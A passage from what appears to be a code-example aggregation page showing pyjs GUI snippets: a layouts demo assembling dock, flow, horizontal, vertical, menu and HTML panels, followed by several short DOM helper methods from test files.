        text += "to make this thing scroll off the bottom of its visible area.  "
        text += "Otherwise, you might have to make it really, really small in order "
        text += "to see the nifty scroll bars!"

        contents = HTML(text)
        scroller = ScrollPanel(contents)
        scroller.setStyleName("ks-layouts-Scroller")

        dock = DockPanel()
        dock.setHorizontalAlignment(HasAlignment.ALIGN_CENTER)
        north0 = HTML("This is the <i>first</i> north component", True)
        east = HTML("<center>This<br>is<br>the<br>east<br>component</center>",
                    True)
        south = HTML("This is the south component")
        west = HTML("<center>This<br>is<br>the<br>west<br>component</center>",
                    True)
        north1 = HTML("This is the <b>second</b> north component", True)
        dock.add(north0, DockPanel.NORTH)
        dock.add(east, DockPanel.EAST)
        dock.add(south, DockPanel.SOUTH)
        dock.add(west, DockPanel.WEST)
        dock.add(north1, DockPanel.NORTH)
        dock.add(scroller, DockPanel.CENTER)

        Logger("Layouts", "TODO: flowpanel")
        flow = FlowPanel()
        for i in range(8):
            flow.add(CheckBox("Flow " + i))

        horz = HorizontalPanel()
        horz.setVerticalAlignment(HasAlignment.ALIGN_MIDDLE)
        horz.add(Button("Button"))
        horz.add(HTML("<center>This is a<br>very<br>tall thing</center>",
                      True))
        horz.add(Button("Button"))

        vert = VerticalPanel()
        vert.setHorizontalAlignment(HasAlignment.ALIGN_CENTER)
        vert.add(Button("Small"))
        vert.add(Button("--- BigBigBigBig ---"))
        vert.add(Button("tiny"))

        menu = MenuBar()
        menu0 = MenuBar(True)
        menu1 = MenuBar(True)
        menu.addNewItem("menu0", False, None, menu0)
        menu.addNewItem("menu1", False, None, menu1)
        menu0.addNewItem("child00")
        menu0.addNewItem("child01")
        menu0.addNewItem("child02")
        menu1.addNewItem("child10")
        menu1.addNewItem("child11")
        menu1.addNewItem("child12")

        Logger("Layouts", "TODO: htmlpanel")
        id = HTMLPanel.createUniqueId()
        text = "This is an <code>HTMLPanel</code>.  It allows you to add "
        text += "components inside existing HTML, like this:" + "<span id='" + id
        text += "'></span>" + "Notice how the menu just fits snugly in there?  Cute."
        html = HTMLPanel(text)

        DOM.setStyleAttribute(menu.getElement(), "display", "inline")
        html.add(menu, id)

        panel = VerticalPanel()
        panel.setSpacing(8)
        panel.setHorizontalAlignment(HasAlignment.ALIGN_CENTER)

        panel.add(self.makeLabel("Dock Panel"))
        panel.add(dock)
        panel.add(self.makeLabel("Flow Panel"))
        panel.add(flow)
        panel.add(self.makeLabel("Horizontal Panel"))
        panel.add(horz)
        panel.add(self.makeLabel("Vertical Panel"))
        panel.add(vert)
        panel.add(self.makeLabel("HTML Panel"))
        panel.add(html)

        self.setWidget(panel)
        self.setStyleName("ks-layouts")
예제 #42
0
 def getOffsetWidth(self, elem):
     """  Returns the offsetWidth element property.
     """
     return DOM.getIntAttribute(elem, "offsetWidth")
예제 #43
0
파일: test009.py 프로젝트: wkornewald/pyjs 
 def __init__(self):
     ComplexPanel.__init__(self)
     self.setElement(DOM.createDiv())
     DOM.setStyleAttribute(self.getElement(), "overflow", "hidden")
예제 #44
0
파일: test008.py 프로젝트: Afey/pyjs 
 def setStyleName(self, style):
     DOM.setAttribute(self.element, "className", style)
예제 #45
0
파일: test009.py 프로젝트: wkornewald/pyjs 
 def add(self, widget):
     ComplexPanel.add(self, widget)
     DOM.appendChild(self.getElement(), widget.getElement())
     return True
예제 #46
0
파일: test008.py 프로젝트: Afey/pyjs 
 def add(self, widget):
     ComplexPanel.add(self, widget)
     DOM.appendChild(self.getElement(), widget.getElement())
     return True
예제 #47
0
 def onAttach(self):
     if self.attached:
         return
     self.attached = True
     DOM.setEventListener(self.getElement(), self)
예제 #48
0
def write(text):
    global data, element
    data += text
    DOM.setInnerHTML(element, data)
예제 #49
0
 def onDetach(self):
     if not self.attached:
         return
     self.attached = False
     DOM.setEventListener(self.getElement(), None)